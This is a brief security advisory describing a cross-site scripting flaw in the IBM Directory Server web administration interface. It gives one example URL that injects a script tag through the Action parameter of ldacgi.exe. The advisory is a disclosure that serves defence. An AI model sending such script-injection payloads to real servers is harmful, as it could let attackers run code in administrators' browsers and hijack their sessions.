IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability

IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability

An exploit is not required. The following example was provided:

https://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script>